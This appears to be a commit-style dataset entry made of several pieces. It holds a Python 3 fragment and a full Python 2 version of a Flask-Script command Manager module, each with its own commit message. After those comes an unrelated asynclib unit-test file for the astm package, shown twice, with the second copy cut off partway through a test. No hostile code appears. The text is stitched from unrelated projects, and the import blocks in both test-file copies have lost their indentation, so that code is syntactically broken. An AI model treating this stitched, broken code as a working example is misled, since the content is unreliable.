        # behavior on Python 2 and also valid on Python 3.
        for name, command in self._commands.items():
            usage = name
            description = command.description
            if description:
                usage += ": " + description
            rv.append(usage)
        return "\n".join(rv)

    def print_usage(self):
        """
        Prints result of get_usage()
        """
        print(self.get_usage())

    def handle(self, prog, name, args=None):
        """Parse args and run the named command inside a request context."""
        args = list(args or [])
        try:
            command = self._commands[name]
        except KeyError:
            raise InvalidCommand("Command %s not found" % name)
        help_args = ('-h', '--help')
        # remove -h from args if present, and add to remaining args so it
        # reaches the command's own parser rather than the app parser
        app_args = [a for a in args if a not in help_args]
        app_parser = self.create_parser(prog)
        app_namespace, remaining_args = app_parser.parse_known_args(app_args)
        for arg in help_args:
            if arg in args:
                remaining_args.append(arg)
        command_parser = command.create_parser(prog + " " + name)
        command_namespace = command_parser.parse_args(remaining_args)
        app = self.create_app(**app_namespace.__dict__)
        with app.test_request_context():
            command.run(app, **command_namespace.__dict__)

    def run(self, commands=None):
        """
        Prepares manager to receive command line input. Usually run
        inside "if __name__ == "__main__" block in a Python script.

        :param commands: optional dict of commands. Appended to any
                         commands added using add_command().
        """
        if commands:
            self._commands.update(commands)
        # Check argv length up front instead of catching IndexError around
        # handle(): the old broad except also swallowed IndexErrors raised
        # *inside* the command being run.
        if len(sys.argv) < 2:
            self.print_usage()
            sys.exit(0)
        try:
            self.handle(sys.argv[0],
                        sys.argv[1],
                        sys.argv[2:])
            sys.exit(0)
        except InvalidCommand as e:
            print(e)
            self.print_usage()
            sys.exit(1)
Added explicit `description` attributes to the Shell and Server commands.
# -*- coding: utf-8 -*-
import sys
import code
import getpass
import inspect
import warnings
import argparse
from flask import Flask
__all__ = ["Command", "Shell", "Server", "Manager", "Option",
"prompt", "prompt_pass", "prompt_bool", "prompt_choices"]
def prompt(name, default=None):
    """
    Grab user input from command line.

    :param name: prompt text
    :param default: default value if no input provided.
    """
    # Show a truthy default inside brackets; questions end with a space,
    # everything else with ": ".
    hint = ' [%s]' % default if default else ''
    tail = ' ' if name.endswith('?') else ': '
    message = name + hint + tail
    while True:
        reply = raw_input(message)
        if reply:
            return reply
        if default is not None:
            return default
def prompt_pass(name, default=None):
    """
    Grabs hidden (password) input from command line.

    :param name: prompt text
    :param default: default value if no input provided.
    """
    # Same message layout as prompt(), but input is read without echo.
    hint = ' [%s]' % default if default else ''
    tail = ' ' if name.endswith('?') else ': '
    message = name + hint + tail
    while True:
        reply = getpass.getpass(message)
        if reply:
            return reply
        if default is not None:
            return default
def prompt_bool(name, default=False, yes_choices=None, no_choices=None):
    """
    Grabs user input from command line and converts to boolean
    value.

    :param name: prompt text
    :param default: default value if no input provided.
    :param yes_choices: default 'y', 'yes', '1', 'on', 'true', 't'
    :param no_choices: default 'n', 'no', '0', 'off', 'false', 'f'
    """
    if not yes_choices:
        yes_choices = ('y', 'yes', '1', 'on', 'true', 't')
    if not no_choices:
        no_choices = ('n', 'no', '0', 'off', 'false', 'f')
    while True:
        reply = prompt(name + '?', 'Y' if default else 'N')
        if not reply:
            return default
        lowered = reply.lower()
        if lowered in yes_choices:
            return True
        if lowered in no_choices:
            return False
        # unrecognized answer: ask again
def prompt_choices(name, choices, default=None):
    """
    Grabs user input from command line from set of provided choices.

    :param name: prompt text
    :param choices: list or tuple of available choices
    :param default: default value if no input provided.
    """
    if default is None:
        default = choices[0]
    # the option list is constant for the whole loop, build it once
    label = '%s? - (%s)' % (name, ', '.join(choices))
    while True:
        reply = prompt(label, default).lower()
        if not reply:
            return default
        if reply in choices:
            # the literal choice 'none' maps to a None result
            return None if reply == 'none' else reply
class Option(object):
    """Container for one ``ArgumentParser.add_argument`` call.

    The positional arguments (a bare name or option strings such as
    ``-f``/``--foo``) and the keyword arguments (``action``, ``nargs``,
    ``const``, ``default``, ``type``, ``choices``, ``required``,
    ``help``, ``metavar``, ``dest`` — see `ArgumentParser.add_argument
    <http://argparse.googlecode.com/svn/trunk/doc/add_argument.html>`_)
    are stored untouched and replayed against an ``argparse`` parser
    when the owning command builds its parser.
    """

    def __init__(self, *args, **kwargs):
        # Pure data holder: nothing is validated until the option is
        # handed to argparse.
        self.args = args
        self.kwargs = kwargs
class Command(object):
    """
    Base class for creating commands.
    """

    # Default (empty) option list; subclasses may define their own.
    option_list = []

    @property
    def description(self):
        # Usage listings show the stripped docstring of the command.
        description = self.__doc__ or ''
        return description.strip()

    def add_option(self, option):
        """
        Adds Option to option list.
        """
        # Rebind to a new instance-level list instead of appending:
        # appending would mutate the class-level option_list that every
        # Command without its own list shares.
        self.option_list = self.option_list + [option]

    def get_options(self):
        """
        By default, returns self.option_list. Override if you
        need to do instance-specific configuration.
        """
        return self.option_list

    def create_parser(self, prog):
        """Build an argparse parser from this command's options."""
        parser = argparse.ArgumentParser(prog=prog,
                                         description=self.description)
        for option in self.get_options():
            parser.add_argument(*option.args, **option.kwargs)
        return parser

    def run(self, app):
        """
        Runs a command. This must be implemented by the subclass. The first
        argument is always the app (Flask instance) followed by arguments
        as configured by the Command options.
        """
        raise NotImplementedError

    # The deprecated wrappers below previously used warnings.warn_explicit,
    # which requires category/filename/lineno arguments and therefore
    # raised TypeError when called; warnings.warn is the correct API.
    def prompt(self, name, default=None):
        warnings.warn(
            "Command.prompt is deprecated, use prompt() function instead",
            DeprecationWarning)
        prompt(name, default)

    def prompt_pass(self, name, default=None):
        warnings.warn(
            "Command.prompt_pass is deprecated, use prompt_pass() function instead",
            DeprecationWarning)
        prompt_pass(name, default)

    def prompt_bool(self, name, default=False):
        warnings.warn(
            "Command.prompt_bool is deprecated, use prompt_bool() function instead",
            DeprecationWarning)
        prompt_bool(name, default)

    def prompt_choices(self, name, choices, default=None):
        warnings.warn(
            "Command.choices is deprecated, use prompt_choices() function instead",
            DeprecationWarning)
        prompt_choices(name, choices, default)
class Shell(Command):
    """
    Runs a Python shell inside Flask application context.
    :param banner: banner appearing at top of shell when started
    :param make_context: a callable returning a dict of variables
                         used in the shell namespace. The callable
                         takes a single argument, "app", the Flask
                         instance. By default returns a dict consisting
                         of just the app.
    :param use_ipython: use IPython shell if available, ignore if not.
                        The IPython shell can be turned off in command
                        line by passing the **--no-ipython** flag.
    """

    banner = ''

    # Fixed usage-listing text; shadows the description property.
    description = 'Runs a Python shell inside Flask application context.'

    def __init__(self, banner=None, make_context=None, use_ipython=True):
        self.banner = banner if banner else self.banner
        self.use_ipython = use_ipython
        if make_context is None:
            # default namespace: just the app itself
            def make_context(app):
                return dict(app=app)
        self.make_context = make_context

    def get_options(self):
        return (
            Option('--no-ipython',
                   action="store_true",
                   dest='no_ipython',
                   default=not (self.use_ipython)),)

    def get_context(self, app):
        """
        Returns a dict of context variables added to the shell namespace.
        """
        return self.make_context(app)

    def run(self, app, no_ipython):
        """
        Runs the shell. Unless no_ipython is True or use_python is False
        then runs IPython shell if that is installed.
        """
        context = self.get_context(app)
        if no_ipython:
            code.interact(self.banner, local=context)
            return
        try:
            # NOTE(review): IPython.Shell.IPShellEmbed is the pre-0.11
            # IPython API — confirm the deployed IPython version matches.
            import IPython
        except ImportError:
            code.interact(self.banner, local=context)
            return
        shell = IPython.Shell.IPShellEmbed(banner=self.banner)
        shell(global_ns=dict(), local_ns=context)
class Server(Command):
    """
    Runs the Flask development server i.e. app.run()
    :param host: server host
    :param port: server port
    :param use_debugger: if False, will no longer use Werkzeug debugger.
                         This can be overriden in the command line
                         by passing the **-d** flag.
    :param use_reloader: if False, will no longer use auto-reloader.
                         This can be overriden in the command line by
                         passing the **-r** flag.
    """

    # Fixed usage-listing text; shadows the description property.
    description = 'Runs the Flask development server i.e. app.run()'

    def __init__(self, host='127.0.0.1', port=5000, use_debugger=True,
                 use_reloader=True):
        self.host = host
        self.port = port
        self.use_debugger = use_debugger
        self.use_reloader = use_reloader

    def get_options(self):
        options = (
            Option('-t', '--host',
                   dest='host',
                   default=self.host),
            Option('-p', '--port',
                   dest='port',
                   type=int,
                   default=self.port),
            # NOTE(review): with action='store_true' and a True default,
            # these flags cannot actually switch the feature off — confirm
            # whether --no-debug/--no-reload variants were intended.
            Option('-d', '--debug',
                   action='store_true',
                   dest='use_debugger',
                   default=self.use_debugger),
            Option('-r', '--reload',
                   action='store_true',
                   dest='use_reloader',
                   default=self.use_reloader),
        )
        return options

    def run(self, app, host, port, use_debugger, use_reloader):
        # Werkzeug's debug flag and the explicit use_debugger are kept in
        # sync, mirroring the original call.
        app.run(host=host, port=port, debug=use_debugger,
                use_debugger=use_debugger, use_reloader=use_reloader)
class InvalidCommand(Exception):
    """Raised when an unknown command name is passed to the Manager."""
    pass
class Manager(object):
    """
    Controller class for handling a set of commands.
    Typical usage::
        class Print(Command):
            def run(self, app):
                print "hello"
        app = Flask(__name__)
        manager = Manager(app)
        manager.add_command("print", Print())
        if __name__ == "__main__":
            manager.run()
    On command line::
        python manage.py print
        > hello
    :param app: Flask instance or callable returning a Flask instance.
    :param with_default_commands: load commands **runserver** and **shell**
                                  by default.
    """
    def __init__(self, app, with_default_commands=True):
        self.app = app
        self._commands = dict()   # command name -> Command instance
        self._options = list()    # application-wide Option instances
        if with_default_commands:
            self.add_default_commands()
    def add_default_commands(self):
        """
        Adds the shell and runserver default commands. To override these
        simply add your own equivalents using add_command or decorators.
        """
        self.add_command("shell", Shell())
        self.add_command("runserver", Server())
    def create_app(self, **kwargs):
        # `app` may be a ready Flask instance or a factory callable; the
        # kwargs (from application-wide options) only reach a factory.
        if isinstance(self.app, Flask):
            return self.app
        return self.app(**kwargs)
    def create_parser(self, prog):
        """
        Creates an ArgumentParser instance from options returned
        by get_options(), and a subparser for the given command.
        """
        parser = argparse.ArgumentParser(prog=prog)
        for option in self.get_options():
            parser.add_argument(*option.args, **option.kwargs)
        return parser
    def get_options(self):
        # Application-wide options registered via add_option().
        return self._options
    def add_option(self, *args, **kwargs):
        """
        Adds an application-wide option. This is useful if you want to set variables
        applying to the application setup, rather than individual commands.
        For this to work, the manager must be initialized with a factory
        function rather than an instance. Otherwise any options you set will
        be ignored.
        The arguments are then passed to your function, e.g.::
            def create_app(config=None):
                app = Flask(__name__)
                if config:
                    app.config.from_pyfile(config)
                return app
            manager = Manager(create_app)
            manager.add_option("-c", "--config", dest="config", required=False)
            > python manage.py -c dev.cfg mycommand
        Any manager options passed in the command line will not be passed to
        the command.
        Arguments for this function are the same as for the Option class.
        """
        self._options.append(Option(*args, **kwargs))
    def command(self, func):
        """
        Adds a command function to the registry.
        :param func: command function. Should take at least one argument, the
                     Flask application. Additional arguments depend on the
                     options.
        """
        args, varargs, keywords, defaults = inspect.getargspec(func)
        options = []
        # first arg is always "app" : ignore
        args = args[1:]
        defaults = defaults or []
        # Pair each trailing positional argument with its default value.
        kwargs = dict(zip(*[reversed(l) for l in (args, defaults)]))
        for arg in args:
            if arg in kwargs:
                default=kwargs[arg]
                if isinstance(default, bool):
                    # A boolean default turns the argument into a flag.
                    options.append(Option('-%s' % arg[0],
                                          '--%s' % arg,
                                          action="store_true",
                                          dest=arg,
                                          required=False,
                                          default=default))
                else:
                    options.append(Option('-%s' % arg[0],
                                          '--%s' % arg,
                                          dest=arg,
                                          required=False,
                                          default=default))
            else:
                # No default: plain positional command argument.
                options.append(Option(arg))
        # Build an ad-hoc Command wrapping the function.
        command = Command()
        command.run = func
        command.__doc__ = func.__doc__
        command.option_list = options
        self.add_command(func.__name__, command)
        return func
    def shell(self, func):
        """
        Decorator that wraps function in shell command. This is equivalent to::
            def _make_context(app):
                return dict(app=app)
            manager.add_command("shell", Shell(make_context=_make_context))
        The decorated function should take a single "app" argument, and return
        a dict.
        For more sophisticated usage use the Shell class.
        """
        self.add_command('shell', Shell(make_context=func))
        return func
    def option(self, *args, **kwargs):
        """
        Decorator to add an option to a function. Automatically registers the
        function - do not use together with ``@command``. You can add as many
        ``@option`` calls as you like, for example::
            @option('-n', '--name', dest='name')
            @option('-u', '--url', dest='url')
            def hello(app, name, url):
                print "hello", name, url
        Takes the same arguments as the ``Option`` constructor.
        """
        option = Option(*args, **kwargs)
        def decorate(func):
            name = func.__name__
            # Register the command on first @option use; later decorators
            # only append to its option list.
            if name not in self._commands:
                command = Command()
                command.run = func
                command.__doc__ = func.__doc__
                command.option_list = []
                self.add_command(name, command)
            self._commands[name].option_list.append(option)
            return func
        return decorate
    def add_command(self, name, command):
        """
        Adds command to registry.
        :param command: Command instance
        """
        self._commands[name] = command
    def get_usage(self):
        """
        Returns string consisting of all commands and their
        descriptions.
        """
        rv = []
        for name, command in self._commands.iteritems():
            usage = name
            description = command.description
            if description:
                usage += ": " + description
            rv.append(usage)
        return "\n".join(rv)
    def print_usage(self):
        """
        Prints result of get_usage()
        """
        print self.get_usage()
    def handle(self, prog, name, args=None):
        # Look up the named command, split argv into manager-level and
        # command-level options, then run the command inside a test request
        # context so Flask globals are usable.
        args = list(args or [])
        try:
            command = self._commands[name]
        except KeyError:
            raise InvalidCommand, "Command %s not found" % name
        help_args = ('-h', '--help')
        # remove -h from args if present, and add to remaining args
        # (so help is rendered by the command parser, not the app parser)
        app_args = [a for a in args if a not in help_args]
        app_parser = self.create_parser(prog)
        app_namespace, remaining_args = app_parser.parse_known_args(app_args)
        for arg in help_args:
            if arg in args:
                remaining_args.append(arg)
        command_parser = command.create_parser(prog + " " + name)
        command_namespace = command_parser.parse_args(remaining_args)
        app = self.create_app(**app_namespace.__dict__)
        with app.test_request_context():
            command.run(app, **command_namespace.__dict__)
    def run(self, commands=None):
        """
        Prepares manager to receive command line input. Usually run
        inside "if __name__ == "__main__" block in a Python script.
        :param commands: optional dict of commands. Appended to any commands
                         added using add_command().
        """
        if commands:
            self._commands.update(commands)
        try:
            self.handle(sys.argv[0],
                        sys.argv[1],
                        sys.argv[2:])
            sys.exit(0)
        except IndexError:
            # No command name on the command line at all.
            self.print_usage()
            sys.exit(0)
        except InvalidCommand, e:
            print e
            self.print_usage()
            sys.exit(1)
|
from astm import asynclib
import unittest
import select
import os
import socket
import threading
import time
import errno
try:
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
def skip(f):
return f
except ImportError:
from test import support as test_support
from test import support
from test.support import TESTFN, run_unittest, unlink
from io import BytesIO as StringIO
from io import FileIO as file
from unittest import skip
HOST = test_support.HOST
class dummysocket:
    """Fake socket that only records whether close() has been called."""
    def __init__(self):
        self.closed = False
    def close(self):
        self.closed = True
    def fileno(self):
        # Arbitrary fixed descriptor; never used for real I/O.
        return 42
class dummychannel:
    """Fake channel owning a dummysocket; used by the close_all() tests."""
    def __init__(self):
        self.socket = dummysocket()
    def close(self):
        self.socket.close()
class exitingdummy:
    """Dispatcher stand-in whose every event handler raises asynclib.ExitNow."""
    def __init__(self):
        pass
    def handle_read_event(self):
        raise asynclib.ExitNow()
    # All event types funnel into the same raising handler.
    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_exception_event = handle_read_event
class crashingdummy:
    """Dispatcher stand-in whose handlers raise a generic Exception.

    Used to verify that non-ExitNow errors are routed to handle_error()
    rather than propagating.
    """
    def __init__(self):
        self.error_handled = False
    def handle_read_event(self):
        raise Exception()
    # All event types funnel into the same raising handler.
    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_exception_event = handle_read_event
    def handle_error(self):
        # Records that asynclib invoked the error hook.
        self.error_handled = True
class dispatcherwithsend_noread(asynclib.Dispatcher):
    """Write-only Dispatcher with a simple outgoing buffer (never readable)."""
    def __init__(self, sock=None, map=None):
        super(dispatcherwithsend_noread, self).__init__(sock, map)
        self.out_buffer = ''  # pending outgoing data, drained in <=512-byte slices
    def initiate_send(self):
        # Push at most 512 bytes per call; keep whatever was not accepted.
        num_sent = super(dispatcherwithsend_noread, self).send(self.out_buffer[:512])
        self.out_buffer = self.out_buffer[num_sent:]
    def handle_write(self):
        self.initiate_send()
    def writable(self):
        # Writable until connected AND the buffer is fully drained.
        return (not self.connected) or len(self.out_buffer)
    def send(self, data):
        # NOTE(review): decode() assumes `data` is bytes; a str argument
        # (e.g. the '\n' sent by the skipped test) fails on Python 3 --
        # confirm callers.
        self.out_buffer += data.decode()
        self.initiate_send()
    def readable(self):
        return False
    def handle_connect(self):
        pass
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
    """Accept one connection on *serv* and copy everything received into *buf*.

    Runs in a helper thread.  Reads until a newline terminator arrives (the
    newline itself is stripped) or the iteration budget runs out, then closes
    the sockets and sets *evt* so the waiting test can proceed.

    :param evt: threading.Event set when the server is done.
    :param buf: file-like object collecting the received payload.
    :param serv: bound, timeout-enabled listening socket (closed on exit).
    """
    try:
        serv.listen(5)
        conn, addr = serv.accept()
    except socket.timeout:
        # No client connected in time; still signal completion below.
        pass
    else:
        n = 200
        while n > 0:
            r, w, e = select.select([conn], [], [])
            if r:
                data = conn.recv(10)
                # BUG FIX: recv() returns bytes on Python 3, so the
                # replace/containment checks must use bytes literals
                # (on Python 2, bytes is str, so this works there too).
                # keep everything except for the newline terminator
                buf.write(data.replace(b'\n', b''))
                if b'\n' in data:
                    break
            n -= 1
            time.sleep(0.01)
        conn.close()
    finally:
        serv.close()
        evt.set()
class HelperFunctionTests(unittest.TestCase):
    """Tests for asynclib's module-level dispatch helpers (read/write/etc.)."""
    def test_readwriteexc(self):
        # Check exception handling behavior of read, write and _exception
        # check that ExitNow exceptions in the object handler method
        # bubbles all the way up through asynclib read/write/_exception calls
        tr1 = exitingdummy()
        self.assertRaises(asynclib.ExitNow, asynclib.read, tr1)
        self.assertRaises(asynclib.ExitNow, asynclib.write, tr1)
        self.assertRaises(asynclib.ExitNow, asynclib.exception, tr1)
        # check that an exception other than ExitNow in the object handler
        # method causes the handle_error method to get called
        tr2 = crashingdummy()
        asynclib.read(tr2)
        self.assertEqual(tr2.error_handled, True)
        tr2 = crashingdummy()
        asynclib.write(tr2)
        self.assertEqual(tr2.error_handled, True)
        tr2 = crashingdummy()
        asynclib.exception(tr2)
        self.assertEqual(tr2.error_handled, True)
    # asynclib.readwrite uses constants in the select module that
    # are not present in Windows systems (see this thread:
    # http://mail.python.org/pipermail/python-list/2001-October/109973.html)
    # These constants should be present as long as poll is available
    if hasattr(select, 'poll'):
        def test_readwrite(self):
            # Check that correct methods are called by readwrite()
            attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
            expected = (
                (select.POLLIN, 'read'),
                (select.POLLPRI, 'expt'),
                (select.POLLOUT, 'write'),
                (select.POLLERR, 'closed'),
                (select.POLLHUP, 'closed'),
                (select.POLLNVAL, 'closed'),
            )
            # Recorder object: each handler just flips its flag.
            class testobj:
                def __init__(self):
                    self.read = False
                    self.write = False
                    self.closed = False
                    self.expt = False
                    self.error_handled = False
                def handle_read_event(self):
                    self.read = True
                def handle_write_event(self):
                    self.write = True
                def handle_close(self):
                    self.closed = True
                def handle_exception_event(self):
                    self.expt = True
                def handle_error(self):
                    self.error_handled = True
            for flag, expectedattr in expected:
                tobj = testobj()
                self.assertEqual(getattr(tobj, expectedattr), False)
                asynclib.readwrite(tobj, flag)
                # Only the attribute modified by the routine we expect to be
                # called should be True.
                for attr in attributes:
                    self.assertEqual(getattr(tobj, attr), attr==expectedattr)
                # check that ExitNow exceptions in the object handler method
                # bubbles all the way up through asynclib readwrite call
                tr1 = exitingdummy()
                self.assertRaises(asynclib.ExitNow, asynclib.readwrite, tr1, flag)
                # check that an exception other than ExitNow in the object handler
                # method causes the handle_error method to get called
                tr2 = crashingdummy()
                self.assertEqual(tr2.error_handled, False)
                asynclib.readwrite(tr2, flag)
                self.assertEqual(tr2.error_handled, True)
    def test_closeall(self):
        self.closeall_check(False)
    def test_closeall_default(self):
        # Same check, but against asynclib's default global socket map.
        self.closeall_check(True)
    def closeall_check(self, usedefault):
        # Check that close_all() closes everything in a given map
        l = []
        testmap = {}
        for i in range(10):
            c = dummychannel()
            l.append(c)
            self.assertEqual(c.socket.closed, False)
            testmap[i] = c
        if usedefault:
            # Temporarily swap our map in as the global one, then restore.
            socketmap = asynclib._SOCKET_MAP
            try:
                asynclib._SOCKET_MAP = testmap
                asynclib.close_all()
            finally:
                testmap, asynclib._SOCKET_MAP = asynclib._SOCKET_MAP, socketmap
        else:
            asynclib.close_all(testmap)
        self.assertEqual(len(testmap), 0)
        for c in l:
            self.assertEqual(c.socket.closed, True)
class DispatcherTests(unittest.TestCase):
    """Basic Dispatcher behavior: defaults, repr and _strerror."""
    def setUp(self):
        pass
    def tearDown(self):
        # Drop any dispatchers registered with the global socket map.
        asynclib.close_all()
    def test_basic(self):
        # A bare Dispatcher defaults to both readable and writable.
        d = asynclib.Dispatcher()
        self.assertEqual(d.readable(), True)
        self.assertEqual(d.writable(), True)
    def test_repr(self):
        d = asynclib.Dispatcher()
        self.assertTrue(repr(d).endswith('Dispatcher at %#x>' % id(d)))
    def test_strerror(self):
        # refers to bug #8573
        err = asynclib._strerror(errno.EPERM)
        if hasattr(os, 'strerror'):
            self.assertEqual(err, os.strerror(errno.EPERM))
        # An unknown error number falls back to a generic message.
        err = asynclib._strerror(-1)
        self.assertTrue("unknown error" in err.lower())
class DispatcherWithSendTests(unittest.TestCase):
    """End-to-end send() test over a real loopback socket (currently skipped)."""
    usepoll = False
    def setUp(self):
        pass
    def tearDown(self):
        asynclib.close_all()
    @skip
    def test_send(self):
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(3)
        self.port = test_support.bind_port(self.sock)
        cap = StringIO()
        args = (self.evt, cap, self.sock)
        # capture_server collects everything sent until a newline arrives.
        threading.Thread(target=capture_server, args=args).start()
        # wait a little longer for the server to initialize (it sometimes
        # refuses connections on slow machines without this wait)
        time.sleep(0.2)
        data = "Suppose there isn't a 16-ton weight?".encode()
        d = dispatcherwithsend_noread()
        d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        d.connect((HOST, self.port))
        # give time for socket to connect
        time.sleep(0.1)
        d.send(data)
        d.send(data)
        d.send('\n')
        # Pump the event loop until the outgoing buffer drains (bounded).
        n = 1000
        while d.out_buffer and n > 0:
            asynclib.poll()
            n -= 1
        self.evt.wait()
        self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
    """Same suite, exercised with the poll()-based loop variant."""
    usepoll = True
class CallLaterTests(unittest.TestCase):
    """Tests for CallLater class."""
    def setUp(self):
        # remove any unfired scheduled call left behind
        asynclib.close_all()
    def scheduler(self, timeout=0.01, count=100):
        # Drive the asynclib scheduler until all scheduled tasks have fired,
        # bounded by `count` iterations so a stuck task can't hang the test.
        while asynclib._SCHEDULED_TASKS and count > 0:
            asynclib.scheduler()
            count -= 1
            time.sleep(timeout)
    def test_interface(self):
        fun = lambda: 0
        self.assertRaises(AssertionError, asynclib.call_later, -1, fun)
        x = asynclib.call_later(3, fun)
        self.assertRaises(AssertionError, x.delay, -1)
        # FIX: use assertTrue instead of the deprecated assert_ alias
        # (deprecated since Python 2.7 / 3.2, removed in 3.12); matches
        # the later revision of this module.
        self.assertTrue(x.cancelled is False)
        x.cancel()
        self.assertTrue(x.cancelled is True)
        # Once cancelled, every further operation must fail.
        self.assertRaises(AssertionError, x.call)
        self.assertRaises(AssertionError, x.reset)
        self.assertRaises(AssertionError, x.delay, 2)
        self.assertRaises(AssertionError, x.cancel)
    def test_order(self):
        # Tasks fire in deadline order, not registration order.
        l = []
        fun = lambda x: l.append(x)
        for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
            asynclib.call_later(x, fun, x)
        self.scheduler()
        self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
    def test_delay(self):
        # delay() moves a task's deadline and re-orders it accordingly.
        l = []
        fun = lambda x: l.append(x)
        asynclib.call_later(0.01, fun, 0.01).delay(0.07)
        asynclib.call_later(0.02, fun, 0.02).delay(0.08)
        asynclib.call_later(0.03, fun, 0.03)
        asynclib.call_later(0.04, fun, 0.04)
        asynclib.call_later(0.05, fun, 0.05)
        asynclib.call_later(0.06, fun, 0.06).delay(0.001)
        self.scheduler()
        self.assertEqual(l, [0.06, 0.03, 0.04, 0.05, 0.01, 0.02])
    def test_reset(self):
        # reset() restarts a task's countdown from "now".
        l = []
        fun = lambda x: l.append(x)
        asynclib.call_later(0.01, fun, 0.01)
        asynclib.call_later(0.02, fun, 0.02)
        asynclib.call_later(0.03, fun, 0.03)
        x = asynclib.call_later(0.04, fun, 0.04)
        asynclib.call_later(0.05, fun, 0.05)
        time.sleep(0.1)
        x.reset()
        self.scheduler()
        self.assertEqual(l, [0.01, 0.02, 0.03, 0.05, 0.04])
    def test_cancel(self):
        # Cancelled tasks never fire.
        l = []
        fun = lambda x: l.append(x)
        asynclib.call_later(0.01, fun, 0.01).cancel()
        asynclib.call_later(0.02, fun, 0.02)
        asynclib.call_later(0.03, fun, 0.03)
        asynclib.call_later(0.04, fun, 0.04)
        asynclib.call_later(0.05, fun, 0.05).cancel()
        self.scheduler()
        self.assertEqual(l, [0.02, 0.03, 0.04])
def test_main():
    """Run every test class in this module via test.support's runner."""
    tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
             CallLaterTests, DispatcherWithSendTests_UsePoll]
    run_unittest(*tests)
if __name__ == "__main__":
    test_main()
Fix deprecation warnings.
from astm import asynclib
import unittest
import select
import os
import socket
import threading
import time
import errno
try:
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
def skip(f):
return f
except ImportError:
from test import support as test_support
from test import support
from test.support import TESTFN, run_unittest, unlink
from io import BytesIO as StringIO
from io import FileIO as file
from unittest import skip
HOST = test_support.HOST
class dummysocket:
    """Fake socket that only records whether close() has been called."""
    def __init__(self):
        self.closed = False
    def close(self):
        self.closed = True
    def fileno(self):
        # Arbitrary fixed descriptor; never used for real I/O.
        return 42
class dummychannel:
    """Fake channel owning a dummysocket; used by the close_all() tests."""
    def __init__(self):
        self.socket = dummysocket()
    def close(self):
        self.socket.close()
class exitingdummy:
    """Dispatcher stand-in whose every event handler raises asynclib.ExitNow."""
    def __init__(self):
        pass
    def handle_read_event(self):
        raise asynclib.ExitNow()
    # All event types funnel into the same raising handler.
    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_exception_event = handle_read_event
class crashingdummy:
    """Dispatcher stand-in whose handlers raise a generic Exception.

    Used to verify that non-ExitNow errors are routed to handle_error()
    rather than propagating.
    """
    def __init__(self):
        self.error_handled = False
    def handle_read_event(self):
        raise Exception()
    # All event types funnel into the same raising handler.
    handle_write_event = handle_read_event
    handle_close = handle_read_event
    handle_exception_event = handle_read_event
    def handle_error(self):
        # Records that asynclib invoked the error hook.
        self.error_handled = True
class dispatcherwithsend_noread(asynclib.Dispatcher):
    """Write-only Dispatcher with a simple outgoing buffer (never readable)."""
    def __init__(self, sock=None, map=None):
        super(dispatcherwithsend_noread, self).__init__(sock, map)
        self.out_buffer = ''  # pending outgoing data, drained in <=512-byte slices
    def initiate_send(self):
        # Push at most 512 bytes per call; keep whatever was not accepted.
        num_sent = super(dispatcherwithsend_noread, self).send(self.out_buffer[:512])
        self.out_buffer = self.out_buffer[num_sent:]
    def handle_write(self):
        self.initiate_send()
    def writable(self):
        # Writable until connected AND the buffer is fully drained.
        return (not self.connected) or len(self.out_buffer)
    def send(self, data):
        # NOTE(review): decode() assumes `data` is bytes; a str argument
        # (e.g. the '\n' sent by the skipped test) fails on Python 3 --
        # confirm callers.
        self.out_buffer += data.decode()
        self.initiate_send()
    def readable(self):
        return False
    def handle_connect(self):
        pass
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
    """Accept one connection on *serv* and copy everything received into *buf*.

    Runs in a helper thread.  Reads until a newline terminator arrives (the
    newline itself is stripped) or the iteration budget runs out, then closes
    the sockets and sets *evt* so the waiting test can proceed.

    :param evt: threading.Event set when the server is done.
    :param buf: file-like object collecting the received payload.
    :param serv: bound, timeout-enabled listening socket (closed on exit).
    """
    try:
        serv.listen(5)
        conn, addr = serv.accept()
    except socket.timeout:
        # No client connected in time; still signal completion below.
        pass
    else:
        n = 200
        while n > 0:
            r, w, e = select.select([conn], [], [])
            if r:
                data = conn.recv(10)
                # BUG FIX: recv() returns bytes on Python 3, so the
                # replace/containment checks must use bytes literals
                # (on Python 2, bytes is str, so this works there too).
                # keep everything except for the newline terminator
                buf.write(data.replace(b'\n', b''))
                if b'\n' in data:
                    break
            n -= 1
            time.sleep(0.01)
        conn.close()
    finally:
        serv.close()
        evt.set()
class HelperFunctionTests(unittest.TestCase):
    """Tests for asynclib's module-level dispatch helpers (read/write/etc.)."""
    def test_readwriteexc(self):
        # Check exception handling behavior of read, write and _exception
        # check that ExitNow exceptions in the object handler method
        # bubbles all the way up through asynclib read/write/_exception calls
        tr1 = exitingdummy()
        self.assertRaises(asynclib.ExitNow, asynclib.read, tr1)
        self.assertRaises(asynclib.ExitNow, asynclib.write, tr1)
        self.assertRaises(asynclib.ExitNow, asynclib.exception, tr1)
        # check that an exception other than ExitNow in the object handler
        # method causes the handle_error method to get called
        tr2 = crashingdummy()
        asynclib.read(tr2)
        self.assertEqual(tr2.error_handled, True)
        tr2 = crashingdummy()
        asynclib.write(tr2)
        self.assertEqual(tr2.error_handled, True)
        tr2 = crashingdummy()
        asynclib.exception(tr2)
        self.assertEqual(tr2.error_handled, True)
    # asynclib.readwrite uses constants in the select module that
    # are not present in Windows systems (see this thread:
    # http://mail.python.org/pipermail/python-list/2001-October/109973.html)
    # These constants should be present as long as poll is available
    if hasattr(select, 'poll'):
        def test_readwrite(self):
            # Check that correct methods are called by readwrite()
            attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
            expected = (
                (select.POLLIN, 'read'),
                (select.POLLPRI, 'expt'),
                (select.POLLOUT, 'write'),
                (select.POLLERR, 'closed'),
